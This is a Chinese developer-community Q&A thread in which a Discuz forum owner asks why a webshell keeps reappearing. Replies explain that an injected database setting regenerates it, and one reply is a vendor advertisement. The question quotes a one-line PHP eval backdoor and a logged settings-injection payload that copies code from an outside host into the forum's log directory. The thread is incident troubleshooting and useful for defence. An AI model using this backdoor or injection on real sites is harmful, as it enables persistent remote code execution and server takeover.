开发者社区> 问答> 正文

我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?

月初的时候收到阿里云的短信通知说论坛的目录中发现有两个webshell的的木马,在discuz论坛的 data/log 目录中,其中一个叫mc5.php文件内的代码为
\"%><?php eval($_POST[ob]);?><%'  我上百度查了下是可以执行任何php程式的木马,另一个php文件代码很多,好像是用来脱库的,于是我立刻删掉了这两个文件。

然后我在discuz后台发现有人盗用了管理员的密码!并在后台执行了以下两行代码(在后台的管理记录中查看到的),两行代码执行的位置都在后台的域名设置中,视乎是利用后台的域名设置选项中的漏洞上传的这个后门! 我当时立刻修改了管理员密码,想说是不是堵住了漏洞!

GET={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; }; POST={settingnew={siteuniqueid=9999; my_sitekey=123456; my_siteid=999; }; domainsubmit=提交; };

GET={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; }; POST={settingnew={maxsmilies=1{${copy('http://t.34597.vip/tm.txt','./data/log/mc5.php')}}; }; domainsubmit=提交; };

但是今天我又收到阿里云的检查到同样的webshell木马,就是那个mc5.php,我上服务器删掉文件,但是立即又生成一个,我去查看discuz的后台管理记录,发现并没有其他人登陆过后台,现在不知道黑客是利用的什么来上传的文件?是不是因为之前管理员密码被盗执行的那两行代码没有得到修复? 我想知道如果购买了安骑士专业版,是可以找出并堵住漏洞还是只能够查出木马然后屏蔽? 如果只是屏蔽不能堵住漏洞的话,跟我现在手动删掉就没啥区别!

展开
收起
厂长 2016-07-16 16:16:13 19777 0
3 条回答
写回答
取消 提交回答
  • Sinesafe专注于网站安全,服务器安全,解决各类网络安全问题,对代码审计以及漏洞修补安全加固有专业的十年实战经验.官方站点www.sinesafe.com

    发现后门(Webshell)文件是因为网站服务器存在漏洞导致被黑客入侵上传了木马webshell后门导致被阿里云安全提示,需要对提示的木马进行删除,然后进行安全加固,需要对网站漏洞进行修复和清理隐藏的木马后门,如果对程序代码不熟悉的话可以向网站漏洞修复公司SINE安全寻求技术支持。

    2022-04-19 10:25:42
    赞同 展开评论 打赏
  • Re我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?
    这种情况你可以先把discuz后台密码修改为强密码,防止再被黑客进入后台
    这种漏洞安骑士现在暂时没法修复的,关键在这行代码



    你可以在本地写一个测试脚本


    这行代码相当于web的后门,PHP在解析到这段payload的时候,会立刻自动执行并不返回结果,所以你一开始即使修改了密码,黑客只要访问到和maxsmilies有关的页面时,webshell又会自动生成

    2016-07-25 10:01:07
    赞同 展开评论 打赏
  • Re我的discuz论坛被植入后门删掉又出现,用安骑士可以彻底修复吗?
    自己摸索着解决了,原来是被写入了数据库自动下载那个后门文件!在pre_common_setting这个表里找到相关字段删除即可!希望可以帮到遇到此问题并像我一样的菜鸟!
    2016-07-16 21:21:20
    赞同 展开评论 打赏
问答排行榜
最热
最新

相关电子书

更多
代码未写,漏洞已出 立即下载
代码未写,漏洞已出——谈谈设计不当导致的安全问题 立即下载
如何产生威胁情报-高级恶意攻击案例分析 立即下载

相关实验场景

更多